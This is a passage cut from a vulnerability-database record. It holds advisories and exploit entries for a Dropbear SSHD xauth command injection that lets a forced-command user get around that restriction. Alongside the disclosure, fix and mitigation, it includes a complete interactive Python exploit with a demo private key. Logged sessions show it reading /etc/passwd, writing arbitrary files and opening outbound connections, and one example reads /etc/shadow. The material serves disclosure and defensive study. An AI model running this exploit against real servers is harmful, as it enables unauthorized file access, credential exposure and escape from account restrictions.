`forced-commands` - connect with user1 and display env information\r\n\r\n\t```c\r\n\t#> python <host> 2222 user1 .demoprivkey\r\n\t\r\n\tINFO:__main__:add this line to your authorized_keys file: \r\n\t#PUBKEY line - force commands: only allow \"whoami\"\r\n\t#cat /home/user/.ssh/authorized_keys\r\n\tcommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box\r\n\t\r\n\tINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222\r\n\tINFO:__main__:connected!\r\n\tINFO:__main__:\r\n\tAvailable commands:\r\n\t .info\r\n\t .readfile <path>\r\n\t .writefile <path> <data>\r\n\t .exit .quit\r\n\t <any xauth command or type help>\r\n\t\r\n\t#> .info\r\n\tDEBUG:__main__:auth_cookie: '\\ninfo'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:Authority file: /home/user1/.Xauthority\r\n\tFile new: no\r\n\tFile locked: no\r\n\tNumber of entries: 2\r\n\tChanges honored: yes\r\n\tChanges made: no\r\n\tCurrent input: (stdin):2\r\n\tuser1\r\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n\t\r\n\t...\r\n\t```\r\n\t\r\n4. `forced-commands` - read `/etc/passwd`\r\n\r\n\t```c\r\n\t...\r\n\t#> .readfile /etc/passwd\r\n\tDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:root:x:0:0:root:/root:/bin/bash\r\n\tdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\r\n\tbin:x:2:2:bin:/bin:/usr/sbin/nologin\r\n\tsys:x:3:3:sys:/dev:/usr/sbin/nologin\r\n\tsync:x:4:65534:sync:/bin:/bin/sync\r\n\t...\r\n\t```\r\n\t\t\r\n5. 
`forced-commands` - write `/tmp/testfile`\r\n\r\n\t```c\r\n\t#> .writefile /tmp/testfile1 `thisisatestfile`\r\n\tDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tDEBUG:__main__:user1\r\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n\t\r\n\t#> INFO:__main__:/tmp/testfile1\r\n\t\r\n\t#> ls -lsat /tmp/testfile1\r\n\t4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1\r\n\t\r\n\t#> cat /tmp/testfile1\r\n\t\u00fa65500hi\u00fa65500`thisisatestfile`\u00aar\r\n\t```\r\n\t\r\n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100\r\n\r\n\t```c\r\n\t#> generate 8.8.8.8:100\r\n\tDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100'\r\n\tDEBUG:__main__:dummy exec returned: None\r\n\tINFO:__main__:user1\r\n\t/usr/bin/xauth: (stdin):1: bad \"add\" command line\r\n\t/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\".\r\n\t\r\n\t#> tcpdump \r\n\tIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0\r\n\t```\t\r\n\r\nFix\r\n---\r\n\r\n* Sanitize user-tainted input `chansess->x11authcookie`\r\n\r\n\r\nMitigation / Workaround\r\n------------------------\r\n\r\n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD`\r\n\r\nNotes\r\n-----\r\n\r\nThanks to the OpenSSH team for coordinating the fix!\r\n\r\nVendor response see: changelog [4]\r\n\r\n\r\nReferences\r\n----------\r\n\r\n\t[1] https://matt.ucc.asn.au/dropbear/dropbear.html\r\n\t[2] http://linux.die.net/man/1/xauth\r\n\t[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/\r\n\t[4] https://matt.ucc.asn.au/dropbear/CHANGES\r\n\t\r\nContact\r\n-------\r\n\r\n\thttps://github.com/tintinweb", "cvss": {"score": 5.5, "vector": 
"AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40119/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:41", "description": "", "published": "2016-03-15T00:00:00", "type": "packetstorm", "title": "Dropbear SSHD xauth Command Injection / Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3116"], "modified": "2016-03-15T00:00:00", "id": "PACKETSTORM:136251", "href": "https://packetstormsecurity.com/files/136251/Dropbear-SSHD-xauth-Command-Injection-Bypass.html", "sourceData": "`Author: <github.com/tintinweb> \nRef: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116 \nVersion: 0.2 \nDate: Mar 3rd, 2016 \n \nTag: dropbearsshd xauth command injection may lead to forced-command bypass \n \nOverview \n-------- \n \nName: dropbear \nVendor: Matt Johnston \nReferences: * https://matt.ucc.asn.au/dropbear/dropbear.html [1] \n \nVersion: 2015.71 \nLatest Version: 2015.71 \nOther Versions: <= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years) \nPlatform(s): linux \nTechnology: c \n \nVuln Classes: CWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection') \nOrigin: remote \nMin. Privs.: post auth \n \nCVE: CVE-2016-3116 \n \n \n \nDescription \n--------- \n \nquote website [1] \n \n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers. \n \nSummary \n------- \n \nAn authenticated user may inject arbitrary xauth commands by sending an \nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it, mitigates this vector. 
\n \nBy injecting xauth commands one gains limited* read/write arbitrary files, \ninformation leakage or xauth-connect capabilities. These capabilities can be \nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \naccount restriction. This is generally not expected. \n \nThe injected xauth commands are performed with the effective permissions of the \nlogged in user as the sshd already dropped its privileges. \n \nQuick-Info: \n \n* requires: X11Forwarding yes \n* does *NOT* bypass /bin/false due to special treatment (like nologin) \n* bypasses forced-commands (allows arbitr. read/write) \n \nCapabilities (xauth): \n \n* Xauth \n* write file: limited chars, xauthdb format \n* read file: limit lines cut at first \\s \n* infoleak: environment \n* connect to other devices (may allow port probing) \n \n \nPoC see ref github. \n \n \nDetails \n------- \n \n// see annotated code below \n \n* x11req (svr-x11fwd.c:46) \n \n* execchild (svr-chansession.c:893) \n*- x11setauth (svr-x11fwd.c:129) \n \nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request \nparameters `x11authprot` and `x11authcookie` from the client ssh packet where \n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`) \nand `x11authcookie` contains the actual x11 auth cookie. This information is stored \nin a session specific datastore. When calling `execute` on that session, dropbear will \ncall `execchild` and - in case it was compiled with x11 support - setup x11 forwarding \nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`. \nNote that `x11authcookie` nor `x11authprot` was sanitized or validated, it just contains \nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a \ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary \n`xauth` commands. 
\n \nThis is an excerpt of the `man xauth` [2] to outline the capabilities of this xauth \ncommand injection: \n \nSYNOPSIS \nxauth [ -f authfile ] [ -vqibn ] [ command arg ... ] \n \nadd displayname protocolname hexkey \ngenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata] \n[n]extract filename displayname... \n[n]list [displayname...] \n[n]merge [filename...] \nremove displayname... \nsource filename \ninfo \nexit \nquit \nversion \nhelp \n? \n \nInteresting commands are: \n \ninfo - leaks environment information / path \n~# xauth info \nxauth: file /root/.Xauthority does not exist \nAuthority file: /root/.Xauthority \nFile new: yes \nFile locked: no \nNumber of entries: 0 \nChanges honored: yes \nChanges made: no \nCurrent input: (argv):1 \n \nsource - arbitrary file read (cut on first `\\s`) \n# xauth source /etc/shadow \nxauth: file /root/.Xauthority does not exist \nxauth: /etc/shadow:1: unknown command \"smithj:Ep6mckrOLChF.:10063:0:99999:7:::\" \n \nextract - arbitrary file write \n* limited characters \n* in xauth.db format \n* since it is not compressed it can be combined with `xauth add` to \nfirst store data in the database and then export it to an arbitrary \nlocation e.g. to plant a shell or do other things. \n \ngenerate - connect to <ip>:<port> (port probing, connect back and pot. exploit \nvulnerabilities in X.org \n \n \nSource \n------ \n \nInline annotations are prefixed with `//#!` \n \n* handle x11 request, stores cookie in `chansess` \n \n/* called as a request for a session channel, sets up listening X11 */ \n/* returns DROPBEAR_SUCCESS or DROPBEAR_FAILURE */ \nint x11req(struct ChanSess * chansess) { \n \nint fd; \n \n/* we already have an x11 connection */ \nif (chansess->x11listener != NULL) { \nreturn DROPBEAR_FAILURE; \n} \n \nchansess->x11singleconn = buf_getbyte(ses.payload); \nchansess->x11authprot = buf_getstring(ses.payload, NULL); //#! 
store user tainted data \nchansess->x11authcookie = buf_getstring(ses.payload, NULL); //#! store user tainted data \nchansess->x11screennum = buf_getint(ses.payload); \n \n* set auth cookie/authprot \n \n/* This is called after switching to the user, and sets up the xauth \n* and environment variables. */ \nvoid x11setauth(struct ChanSess *chansess) { \n \nchar display[20]; /* space for \"localhost:12345.123\" */ \nFILE * authprog = NULL; \nint val; \n \nif (chansess->x11listener == NULL) { \nreturn; \n} \n \n... \n \n/* popen is a nice function - code is strongly based on OpenSSH's */ \nauthprog = popen(XAUTH_COMMAND, \"w\"); //#! run xauth binary \nif (authprog) { \nfprintf(authprog, \"add %s %s %s\\n\", \ndisplay, chansess->x11authprot, chansess->x11authcookie); //#! \\n injection in cookie, authprot \npclose(authprog); \n} else { \nfprintf(stderr, \"Failed to run %s\\n\", XAUTH_COMMAND); \n} \n} \n \nProof of Concept \n---------------- \n \nPrerequisites: \n \n* install python 2.7.x \n* issue `#> pip install paramiko` to install `paramiko` ssh library for python 2.x \n* run `poc.py` \n \nNote: see cve-2016-3115 [3] for `poc.py` \n \nUsage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n \npoc: \n \n1. configure one user (user1) for `force-commands`: \n \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user1/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user1@box \n \n#cat /etc/passwd \nuser1:x:1001:1001:,,,:/home/user1:/bin/bash \n \n2. 
run dropbearsshd (x11fwd is on by default) \n \n#> ~/dropbear-2015.71/dropbear -R -F -E -p 2222 \n[22861] Not backgrounding \n[22862] Child connection from 192.168.139.1:49597 \n[22862] Forced command 'whoami' \n[22862] Pubkey auth succeeded for 'user1' with key md5 dc:b8:56:71:89:36:fb:dc:0e:a0:2b:17:b9:83:d2:dd from 192.168.139.1:49597 \n \n \n3. `forced-commands` - connect with user1 and display env information \n \n#> python <host> 22 user1 .demoprivkey \n \nINFO:__main__:add this line to your authorized_keys file: \n#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n \nINFO:__main__:connecting to: user1:<PKEY>@192.168.139.129:2222 \nINFO:__main__:connected! \nINFO:__main__: \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n \n#> .info \nDEBUG:__main__:auth_cookie: '\\ninfo' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:Authority file: /home/user1/.Xauthority \nFile new: no \nFile locked: no \nNumber of entries: 2 \nChanges honored: yes \nChanges made: no \nCurrent input: (stdin):2 \nuser1 \n/usr/bin/xauth: (stdin):1: bad \"add\" command line \n... \n \n4. `forced-commands` - read `/etc/passwd` \n \n... 
\n#> .readfile /etc/passwd \nDEBUG:__main__:auth_cookie: 'xxxx\\nsource /etc/passwd\\n' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:root:x:0:0:root:/root:/bin/bash \ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin \nbin:x:2:2:bin:/bin:/usr/sbin/nologin \nsys:x:3:3:sys:/dev:/usr/sbin/nologin \nsync:x:4:65534:sync:/bin:/bin/sync \n... \n \n5. `forced-commands` - write `/tmp/testfile` \n \n#> .writefile /tmp/testfile1 `thisisatestfile` \nDEBUG:__main__:auth_cookie: '\\nadd 127.0.0.250:65500 `thisisatestfile` aa' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:auth_cookie: '\\nextract /tmp/testfile1 127.0.0.250:65500' \nDEBUG:__main__:dummy exec returned: None \nDEBUG:__main__:user1 \n/usr/bin/xauth: (stdin):1: bad \"add\" command line \n \n#> INFO:__main__:/tmp/testfile1 \n \n#> ls -lsat /tmp/testfile1 \n4 -rw------- 1 user1 user1 59 xx xx 12:51 /tmp/testfile1 \n \n#> cat /tmp/testfile1 \n\\FA65500hi\\FA65500`thisisatestfile`\\AAr \n \n \n6. `forced-commands` - initiate outbound X connection to 8.8.8.8:6100 \n \n#> generate 8.8.8.8:100 \nDEBUG:__main__:auth_cookie: '\\ngenerate 8.8.8.8:100' \nDEBUG:__main__:dummy exec returned: None \nINFO:__main__:user1 \n/usr/bin/xauth: (stdin):1: bad \"add\" command line \n/usr/bin/xauth: (stdin):2: unable to open display \"8.8.8.8:100\". \n \n#> tcpdump \nIP <host> 8.8.8.8.6100: Flags [S], seq 81800807, win 29200, options [mss 1460,sackOK,TS val 473651893 ecr 0,nop,wscale 10], length 0 \n \n \nMitigation / Workaround \n------------------------ \n \n* disable x11-forwarding: re-compile without x11 support: remove `options.h` -> `#define ENABLE_X11FWD` \n \nNotes \n----- \n \nThanks to the OpenSSH team for coordinating the fix! 
\n \nVendor response see: changelog [4] \n \n \nReferences \n---------- \n \n[1] https://matt.ucc.asn.au/dropbear/dropbear.html \n[2] http://linux.die.net/man/1/xauth \n[3] https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115/ \n[4] https://matt.ucc.asn.au/dropbear/CHANGES \n \n \n \n======= poc.py ======== \n \n#!/usr/bin/env python \n# -*- coding: UTF-8 -*- \n# Author : <github.com/tintinweb> \n############################################################################### \n# \n# FOR DEMONSTRATION PURPOSES ONLY! \n# \n############################################################################### \nimport logging \nimport StringIO \nimport sys \nimport os \n \nLOGGER = logging.getLogger(__name__) \ntry: \nimport paramiko \nexcept ImportError, ie: \nlogging.exception(ie) \nlogging.warning(\"Please install python-paramiko: pip install paramiko / easy_install paramiko / <distro_pkgmgr> install python-paramiko\") \nsys.exit(1) \n \nclass SSHX11fwdExploit(object): \ndef __init__(self, hostname, username, password, port=22, timeout=0.5, \npkey=None, pkey_pass=None): \nself.ssh = paramiko.SSHClient() \nself.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \nif pkey: \npkey = paramiko.RSAKey.from_private_key(StringIO.StringIO(pkey),pkey_pass) \nself.ssh.connect(hostname=hostname, port=port, \nusername=username, password=password, \ntimeout=timeout, banner_timeout=timeout, \nlook_for_keys=False, pkey=pkey) \n \ndef exploit(self, cmd=\"xxxx\\n?\\nsource /etc/passwd\\n\"): \ntransport = self.ssh.get_transport() \nsession = transport.open_session() \nLOGGER.debug(\"auth_cookie: %s\"%repr(cmd)) \nsession.request_x11(auth_cookie=cmd) \nLOGGER.debug(\"dummy exec returned: %s\"%session.exec_command(\"\")) \n \ntransport.accept(0.5) \nsession.recv_exit_status() # block until exit code is ready \nstdout, stderr = [],[] \nwhile session.recv_ready(): \nstdout.append(session.recv(4096)) \nwhile session.recv_stderr_ready(): 
\nstderr.append(session.recv_stderr(4096)) \nsession.close() \nreturn ''.join(stdout)+''.join(stderr) # catch stdout, stderr \n \ndef exploit_fwd_readfile(self, path): \ndata = self.exploit(\"xxxx\\nsource %s\\n\"%path) \nif \"unable to open file\" in data: \nraise IOError(data) \nret = [] \nfor line in data.split('\\n'): \nst = line.split('unknown command \"',1) \nif len(st)==2: \nret.append(st[1].strip(' \"')) \nreturn '\\n'.join(ret) \n \ndef exploit_fwd_write_(self, path, data): \n''' \nadds display with protocolname containing userdata. badchars=<space> \n \n''' \ndummy_dispname = \"127.0.0.250:65500\" \nret = self.exploit('\\nadd %s %s aa'%(dummy_dispname, data)) \nif ret.count('bad \"add\" command line')>1: \nraise Exception(\"could not store data most likely due to bad chars (no spaces, quotes): %s\"%repr(data)) \nLOGGER.debug(self.exploit('\\nextract %s %s'%(path,dummy_dispname))) \nreturn path \n \ndemo_authorized_keys = '''#PUBKEY line - force commands: only allow \"whoami\" \n#cat /home/user/.ssh/authorized_keys \ncommand=\"whoami\" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RpYKrvPkIzvAYfX/ZeU1UzLuCVWBgJUeN/wFRmj4XKl0Pr31I+7ToJnd7S9JTHkrGVDu+BToK0f2dCWLnegzLbblr9FQYSif9rHNW3BOkydUuqc8sRSf3M9oKPDCmD8GuGvn40dzdub+78seYqsSDoiPJaywTXp7G6EDcb9N55341o3MpHeNUuuZeiFz12nnuNgE8tknk1KiOx3bsuN1aer8+iTHC+RA6s4+SFOd77sZG2xTrydblr32MxJvhumCqxSwhjQgiwpzWd/NTGie9xeaH5EBIh98sLMDQ51DIntSs+FMvDx1U4rZ73OwliU5hQDobeufOr2w2ap7td15 user@box \n''' \nPRIVKEY = \"\"\"-----BEGIN RSA PRIVATE KEY----- \nMIIEowIBAAKCAQEAtUaWCq7z5CM7wGH1/2XlNVMy7glVgYCVHjf8BUZo+FypdD69 \n9SPu06CZ3e0vSUx5KxlQ7vgU6CtH9nQli53oMy225a/RUGEon/axzVtwTpMnVLqn \nPLEUn9zPaCjwwpg/Brhr5+NHc3bm/u/LHmKrEg6IjyWssE16exuhA3G/Teed+NaN \nzKR3jVLrmXohc9dp57jYBPLZJ5NSojsd27LjdWnq/PokxwvkQOrOPkhTne+7GRts \nU68nW5a99jMSb4bpgqsUsIY0IIsKc1nfzUxonvcXmh+RASIffLCzA0OdQyJ7UrPh \nTLw8dVOK2e9zsJYlOYUA6G3rnzq9sNmqe7XdeQIDAQABAoIBAHu5M4sTIc8h5RRH \nSBkKuMgOgwJISJ3c3uoDF/WZuudYhyeZ8xivb7/tK1d3HQEQOtsZqk2P8OUNNU6W 
\ns1F5cxQLLXvS5i/QQGP9ghlBQYO/l+aShrY7vnHlyYGz/68xLkMt+CgKzaeXDc4O \naDnS6iOm27mn4xdpqiEAGIM7TXCjcPSQ4l8YPxaj84rHBcD4w033Sdzc7i73UUne \neuQL7bBz5xNibOIFPY3h4q6fbw4bJtPBzAB8c7/qYhJ5P3czGxtqhSqQRogK8T6T \nA7fGezF90krTGOAz5zJGV+F7+q0L9pIR+uOg+OBFBBmgM5sKRNl8pyrBq/957JaA \nrhSB0QECgYEA1604IXr4CzAa7tKj+FqNdNJI6jEfp99EE8OIHUExTs57SaouSjhe \nDDpBRSTX96+EpRnUSbJFnXZn1S9cZfT8i80kSoM1xvHgjwMNqhBTo+sYWVQrfBmj \nbDVVbTozREaMQezgHl+Tn6G1OuDz5nEnu+7gm1Ud07BFLqi8Ssbhu2kCgYEA1yrc \nKPIAIVPZfALngqT6fpX6P7zHWdOO/Uw+PoDCJtI2qljpXHXrcI4ZlOjBp1fcpBC9 \n2Q0TNUfra8m3LGbWfqM23gTaqLmVSZSmcM8OVuKuJ38wcMcNG+7DevGYuELXbOgY \nnimhjY+3+SXFWIHAtkJKAwZbPO7p857nMcbBH5ECgYBnCdx9MlB6l9rmKkAoEKrw \nGt629A0ZmHLftlS7FUBHVCJWiTVgRBm6YcJ5FCcRsAsBDZv8MW1M0xq8IMpV83sM \nF0+1QYZZq4kLCfxnOTGcaF7TnoC/40fOFJThgCKqBcJQZKiWGjde1lTM8lfTyk+f \nW3p2+20qi1Yh+n8qgmWpsQKBgQCESNF6Su5Rjx+S4qY65/spgEOOlB1r2Gl8yTcr \nbjXvcCYzrN4r/kN1u6d2qXMF0zrPk4tkumkoxMK0ThvTrJYK3YWKEinsucxSpJV/ \nnY0PVeYEWmoJrBcfKTf9ijN+dXnEdx1LgATW55kQEGy38W3tn+uo2GuXlrs3EGbL \nb4qkQQKBgF2XUv9umKYiwwhBPneEhTplQgDcVpWdxkO4sZdzww+y4SHifxVRzNmX \nAo8bTPte9nDf+PhgPiWIktaBARZVM2C2yrKHETDqCfme5WQKzC8c9vSf91DSJ4aV \npryt5Ae9gUOCx+d7W2EU7RIn9p6YDopZSeDuU395nxisfyR1bjlv \n-----END RSA PRIVATE KEY-----\"\"\" \n \n \nif __name__==\"__main__\": \nlogging.basicConfig(loglevel=logging.DEBUG) \nLOGGER.setLevel(logging.DEBUG) \n \nif not len(sys.argv)>4: \nprint \"\"\" Usage: <host> <port> <username> <password or path_to_privkey> \n \npath_to_privkey - path to private key in pem format, or '.demoprivkey' to use demo private key \n \n\"\"\" \nsys.exit(1) \nhostname, port, username, password = sys.argv[1:] \nport = int(port) \npkey = None \nif os.path.isfile(password): \npassword = None \nwith open(password,'r') as f: \npkey = f.read() \nelif password==\".demoprivkey\": \npkey = PRIVKEY \npassword = None \nLOGGER.info(\"add this line to your authorized_keys file: \\n%s\"%demo_authorized_keys) \n \nLOGGER.info(\"connecting to: %s:%s@%s:%s\"%(username,password if not 
pkey else \"<PKEY>\", hostname, port)) \nex = SSHX11fwdExploit(hostname, port=port, \nusername=username, password=password, \npkey=pkey, \ntimeout=10 \n) \nLOGGER.info(\"connected!\") \nLOGGER.info (\"\"\" \nAvailable commands: \n.info \n.readfile <path> \n.writefile <path> <data> \n.exit .quit \n<any xauth command or type help> \n\"\"\") \nwhile True: \ncmd = raw_input(\"#> \").strip() \nif cmd.lower().startswith(\".exit\") or cmd.lower().startswith(\".quit\"): \nbreak \nelif cmd.lower().startswith(\".info\"): \nLOGGER.info(ex.exploit(\"\\ninfo\")) \nelif cmd.lower().startswith(\".readfile\"): \nLOGGER.info(ex.exploit_fwd_readfile(cmd.split(\" \",1)[1])) \nelif cmd.lower().startswith(\".writefile\"): \nparts = cmd.split(\" \") \nLOGGER.info(ex.exploit_fwd_write_(parts[1],' '.join(parts[2:]))) \nelse: \nLOGGER.info(ex.exploit('\\n%s'%cmd)) \n \n# just playing around \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit(\"\\ninfo\") \n#print ex.exploit(\"\\ngenerate <ip>:600<port> .\") # generate <ip>:port port=port+6000 \n#print ex.exploit(\"\\nlist\") \n#print ex.exploit(\"\\nnlist\") \n#print ex.exploit('\\nadd xx xx \"\\n') \n#print ex.exploit('\\ngenerate :0 . 
data \"') \n#print ex.exploit('\\n?\\n') \n#print ex.exploit_fwd_readfile(\"/etc/passwd\") \n#print ex.exploit_fwd_write_(\"/tmp/somefile\", data=\"`whoami`\") \nLOGGER.info(\"--quit--\") \n \n`\n", "cvss": {"score": 5.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/136251/dropbearsshd-bypass.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:13", "description": "\nDropBearSSHD 2015.71 - Command Injection", "edition": 1, "published": "2016-03-03T00:00:00", "title": "DropBearSSHD 2015.71 - Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-3115", "CVE-2016-3116"], "modified": "2016-03-03T00:00:00", "id": "EXPLOITPACK:F92411A645D85F05BDBD274FD222226F", "href": "", "sourceData": "VuNote\n============\n\n\tAuthor:\t\t<github.com/tintinweb>\n\tRef:\t\thttps://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3116\n\tVersion: \t0.2\n\tDate: \t\tMar 3rd, 2016\n\t\n\tTag:\t\tdropbearsshd xauth command injection may lead to forced-command bypass\n\nOverview\n--------\n\n\tName:\t\t\tdropbear\n\tVendor:\t\t\tMatt Johnston\n\tReferences:\t\t* https://matt.ucc.asn.au/dropbear/dropbear.html [1]\n\t\n\tVersion:\t\t2015.71\n\tLatest Version:\t2015.71\n\tOther Versions:\t<= 2015.71 (basically all versions with x11fwd support; v0.44 ~11 years)\n\tPlatform(s):\tlinux\n\tTechnology:\t\tc\n\n\tVuln Classes:\tCWE-93 - Improper Neutralization of CRLF Sequences ('CRLF Injection')\n\tOrigin:\t\t\tremote\n\tMin. Privs.:\tpost auth\n\n\tCVE:\t\t\tCVE-2016-3116\n\n\n\nDescription\n---------\n\nquote website [1]\n\n>Dropbear is a relatively small SSH server and client. It runs on a variety of POSIX-based platforms. Dropbear is open source software, distributed under a MIT-style license. 
Dropbear is particularly useful for \"embedded\"-type Linux (or other Unix) systems, such as wireless routers.\n\nSummary \n-------\n\nAn authenticated user may inject arbitrary xauth commands by sending an\nx11 channel request that includes a newline character in the x11 cookie. \nThe newline acts as a command separator to the xauth binary. This attack requires \nthe server to have 'X11Forwarding yes' enabled. Disabling it mitigates this vector.\n\nBy injecting xauth commands one gains limited* arbitrary file read/write, \ninformation leakage or xauth-connect capabilities. These capabilities can be\nleveraged by an authenticated restricted user - e.g. one with configured forced-commands - to bypass \naccount restrictions. This is generally not expected.\n\nThe injected xauth commands are performed with the effective permissions of the \nlogged-in user, as the sshd has already dropped its privileges. \n\nQuick-Info:\n\n* requires: X11Forwarding yes\n* does *NOT* bypass /bin/false due to special treatment (like nologin)\n* bypasses forced-commands (allows arbitrary read/write)\n\nCapabilities (xauth):\n\n* Xauth\n\t* write file: limited chars, xauthdb format\n\t* read file: limited, lines cut at first \\s\n\t* infoleak: environment\n\t* connect to other devices (may allow port probing)\n\n\nsee attached PoC\n\n\nDetails\n-------\n\n// see annotated code below\n\n\t* x11req (svr-x11fwd.c:46)\n \n * execchild (svr-chansession.c:893)\n *- x11setauth (svr-x11fwd.c:129)\n\nUpon receiving an `x11-req` type channel request dropbearsshd parses the channel request\nparameters `x11authprot` and `x11authcookie` from the client ssh packet, where\n`x11authprot` contains the x11 authentication method used (e.g. `MIT-MAGIC-COOKIE-1`)\nand `x11authcookie` contains the actual x11 auth cookie. This information is stored\nin a session-specific datastore. 
When calling `execute` on that session, dropbear will\ncall `execchild` and - in case it was compiled with x11 support - set up x11 forwarding\nby executing `xauth` with the effective permissions of the user and pass commands via `stdin`.\nNote that neither `x11authcookie` nor `x11authprot` is sanitized or validated; both contain\nuser-tainted data. Since `xauth` commands are passed via `stdin` and `\\n` is a\ncommand-separator to the `xauth` binary, this allows a client to inject arbitrary\n`xauth` commands.\n\nThis is an excerpt from `man xauth` [2] to outline the capabilities of this xauth\ncommand injection:\n\n\tSYNOPSIS\n \txauth [ -f authfile ] [ -vqibn ] [ command arg ... ]\n\n\t\tadd displayname protocolname hexkey\n\t\tgenerate displayname protocolname [trusted|untrusted] [timeout seconds] [group group-id] [data hexdata]\n\t\t[n]extract filename displayname...\n\t\t[n]list [displayname...]\n\t\t[n]merge [filename...]\n\t\tremove displayname...\n\t\tsource filename\n\t\tinfo \n\t\texit\n\t\tquit\n\t\tversion\n\t\thelp\n\t\t?\n\t\t\nInteresting commands are:\n\t\n\tinfo\t - leaks environment information / path\n\t\t\t~# xauth info\n\t\t\txauth: file /root/.Xauthority does not exist\n\t\t\tAuthority file: /root/.Xauthority\n\t\t\tFile new: yes\n\t\t\tFile locked: no\n\t\t\tNumber of entries: 0\n\t\t\tChanges honored: yes\n\t\t\tChanges made: no\n\t\t\tCurrent input: 